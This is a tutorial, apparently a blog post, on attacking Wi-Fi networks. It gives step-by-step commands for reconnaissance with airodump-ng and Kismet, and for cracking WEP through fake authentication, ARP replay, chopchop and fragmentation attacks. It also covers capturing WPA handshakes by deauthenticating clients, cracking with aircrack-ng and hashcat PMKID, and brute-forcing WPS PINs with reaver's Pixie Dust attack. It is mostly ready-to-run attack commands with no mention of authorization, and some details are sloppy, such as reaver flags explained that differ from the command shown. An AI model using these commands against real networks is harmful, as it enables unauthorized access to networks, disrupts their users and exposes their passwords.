Attacking Wireless network - WiFi Hacking
Before starting, lets get some basics:
Wired Equivalent Privacy (WEP)
WEP was developed for wireless networks and it was supposed to offer the same security level as wired networks, however there are a lot of well-known security issues in WEP.
Wi-Fi Protected Access (WPA\WPA2)
WPA\WPA2 implements all mandatory features from 802.11i. It provides a significant security improvement over WEP . The most important architectural change is the data encryption algorithm. In WPA2 the Counter Mode with Cipher block Chaining Message Authentication Code Protocol (CCMP) uses an Advanced Encryption Standard (AES)
Wi-Fi Protected Setup (WPS)
WPS stands for Wi-Fi Protected Setup. It is a wireless network security standard that tries to make connections between a router and wireless devices (cameras) faster and easier. WPS works only for wireless networks that use a password that is encrypted with the WPA Personal or WPA2 Personal security protocols.
Phase 1 — Discovery Wireless Reconnaissance
Discovery phase for Wi-Fi can be implemented using several tools -You can use whatever tool you like-:
Airgraph-ng
Place your wireless card into monitor mode.
airmon-ng start <interface> <AP channel>Run an Airodump capture for an hour or more, saving the capture to disk.
airodump-ng -c <AP Channel> --bssid <AP MAC> -w <capture> <interface>There are two types of diagrams CAPR/CPG to generate:
- CAPR (Client to AP Relationship)
- CPG (Common probe graph)
Usage:
sudo airgraph-ng -i <csv filename> -g <CAPR/CPG> -o <output filename>.pngroot@kali:~# sudo airgraph-ng -i cap-the-zone-01.csv -g CPG -o the-zone.png**** WARNING Images can be large, up to 12 Feet by 12 Feet****
Creating your Graph using, dump-01.csv and writing to, capr.png
Depending on your system this can take a bit. Please standby.....
-o: OUTPUT Our Output Image ie… Image.png
-i: Airodump txt file in CSV format. NOT the pcap
- g: Graph Type Current [CAPR (Client to AP Relationship) OR CPG (Common probe graph)]
Open the img file:
root@kali:~# eog thezone-CAPR.png
Kismet — Highly recommended
Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic.
The tool is installed in Kali and Parrot OS by default.
Usage:
root@kali:~# kismet -c <interface>
Phase 2 - Start the attack
After gathering enough information about the target wireless network, it is time to attack it.
Attacking WEB
Exploiting WEP via connected clients
- ARP request replay attack — (Most reliable attack)
Place your wireless card into monitor mode on the channel number of the AP:
airmon-ng start <interface> <AP channel>Start an Airodump-ng capture filtering on the AP channel and BSSID, saving the file to disk:
airodump-ng -c <AP Channel> --bssid <AP MAC> -w <capture> <interface>— ivs flag stores only the weak initialization vectors and not the full packet.
airodump-ng -c <Channel> --bssid <BSSID> -w <Capture> --ivs <interface>Conduct a fake authentication attack against the AP:
aireplay-ng -1 0 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>Launch the ARP request replay attack:
aireplay-ng -3 -b <AP MAC> -h <Your MAC> <interface>Deauthenticate the connected client to force new IV generation by the AP:
aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> <interface>Once a significant number of IVs have been captured, run Aircrack-ng against the Airodump capture | OR while still capturing:
aircrack-ng -0 -z <capture>Exploiting WEP with no-connected clients
Fragmentation Attack/KoreK chopchop attack
Place your wireless card into monitor mode on the channel number of the AP:
airmon-ng start <interface> <AP channel>Start an Airodump-ng capture, filtering on the AP channel and BSSID, saving the capture:
airodump-ng -c <AP channel> --bssid <AP MAC> -w <capture> <interface>We will run the fake authentication with a reassociation timing of 6000 so it doesn’t time out.
aireplay-ng -1 0 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>Run attack 4, the KoreK chopchop attack (or attack 5, the fragmentation attack):
aireplay-ng -4 -b <AP MAC> -h <Your MAC> <interface>
aireplay-ng -5 -b <AP MAC> -h <Our MAC> <interface>Now you can build a packet with packetforge-ng out of that 1500 bytes.
Craft an ARP request packet using packetforge-ng:
packetforge-ng -0 -a <AP MAC> -h <Your MAC> -k <Dest IP> -l <Source IP> -y <xor file> -w <output file>• -0: generate an ARP request packet
• -a: the AP MAC address
• -h: the source (usually yours) MAC address
• -k: the destination IP i.e. in ARP, this is “Who has this IP”
• -l: the source IP i.e. in ARP, this is “Tell this IP”
• -y: the PRGA filename
• -w: the filename to save the packet to
Inject the packet into the network using attack 2, the interactive packet replay attack:
aireplay-ng -2 -r <packet filename> <interface>last thing is to crack the WEP key using Aircrack-ng:
aircrack-ng <capture>Attacking WPA/WPA2
- Placing the wireless card into monitor mode
airmon-ng start <interface> <AP channel>- Start an Airodump capture
airodump-ng -c <AP channel> --bssid <AP MAC> -w <capture> <interface>- Deauthenticate a connected client to force it to complete the 4-way handshake
aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> <interface>It should now appear in airodump-ng window that a handshake with the targeted BSSID has been captured.
- Crack the WPA password with Aircrack-ng:
aircrack-ng -w <wordlist> <capture>PMKID Hashcat Attack
- Download hcxdumptool:
git clone https://github.com/ZerBea/hcxdumptool.git- Solve dependencies:
sudo apt-get install libcurl4-openssl-dev libssl-dev pkg-config
make
make install- Download hcxtools:
git clone https://github.com/ZerBea/hcxtools.git
make
make install- Start monitor mood
airmon-ng check kill
airmon-ng start <interface>- Use Hxcdump to Capture PMKIDs from Local Networks
hcxdumptool -i <interface> -o output.pcapng --enable_status=1- Run hcxpcaptool to convert the captured data from pcapng format to a hash format accepted by hashcat.
./hcxpcaptool -z test.16800 test.pcapng
start reading from test.pcapng
summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.17.11-arch1
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 66
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 1
probe responses..............: 11
association requests.........: 5
association responses........: 5
authentications (OPEN SYSTEM): 13
authentications (BROADCOM)...: 1
EAPOL packets................: 14
EAPOL PMKIDs.................: 1
1 PMKID(s) written to test.16800- Crack with hashcat
hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'Attacking WPS
Access points that have WPS enabled are vulnerable to a brute-force (brute-force) attack of this PIN. Once the WPS PIN is selected, you can connect to the access point, as well as learn its WPA / WPA2 password.
Discover WPS network around you:
root@kali:~# airodump-ng wlan0 --manufacturer --uptime --wps
Using wash:
root@kali:~# wash -i <interface name>
Only access point suitable for the attack, in which the column Lck is No , that is, which is not blocked by WPS and WPS version is 1.
Exploiting WPS — Pixie dust attack:
- Using reaver:
reaver -i <interface> -b <MAC_Address_AP> -K
root@kali: reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv -L -N -c 1 –K-L: Ignore locked WPS state.
-N: Don’t send NACK packets when errors are detected.
-d 15: Delay 15 seconds between PIN attempts.
-T: Set timeout period to half a second.
- r 3:15: After 3 attempts, sleep for 15 seconds.
Others tools you can try:
Last thing to add is that this guide is not complete, there are more attacks that can be used againt WiFi access points, but the attacks mentioned above are the most common and it can build up a strong foundation into WiFi hacking.
